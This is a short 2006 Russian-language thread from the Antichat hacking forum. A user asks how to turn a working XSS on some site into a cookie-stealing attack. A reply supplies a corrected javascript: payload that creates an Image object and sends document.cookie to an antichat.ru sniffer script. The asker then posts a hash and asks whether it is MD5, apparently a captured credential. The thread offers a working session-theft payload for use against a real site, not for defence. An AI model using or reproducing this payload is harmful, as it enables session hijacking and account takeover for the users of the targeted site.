Форум АНТИЧАТ - Вопрос про сниффер

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Вопрос про сниффер (https://forum.antichat.xyz/showthread.php?t=19112)

Ponchik

14.05.2006 21:45

Вопрос про сниффер

Всем привет! Прошу строго не судить! Я просто не понимаю как логически-верно составить код! Вот такое на сайте проходит

Код HTML:

javascript:alert('XSS')

А вот подстроить под него античатовский сниффер немогу! Я думал надо

Код HTML:

javascript:img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

а не получилось... Помогите, а :confused:
P.S.<script></script> тама не получается, надо как-то через javascript: это возможно?

Tem	14.05.2006 22:00

В хтмл смотрел во что преврошается <script></script> ?

Ponchik

14.05.2006 22:26

CinerX

15.05.2006 00:41

Цитата:

А вот подстроить под него античатовский сниффер немогу!

Дело в том что у тебя в примере который ты дал ошибка. Для того чтоб сработала

Код:

javascript: img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

Тебе надо для начало создать обьект img.
Т.е. так будет правильно:

Код:

javascript:img=new Image();img.src= "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

Ponchik

15.05.2006 18:44

CinerX, РЕСПЕКТ И ОГРОМНОЕ СПАСИБО!!!!
У меня вопрос... Это md5? 5cf88br3f7ddb3drdee78ecefr9e2aaa

m0nzt3r

16.05.2006 11:23

32 символов.МД5.Тема закрыта.

Время: 17:47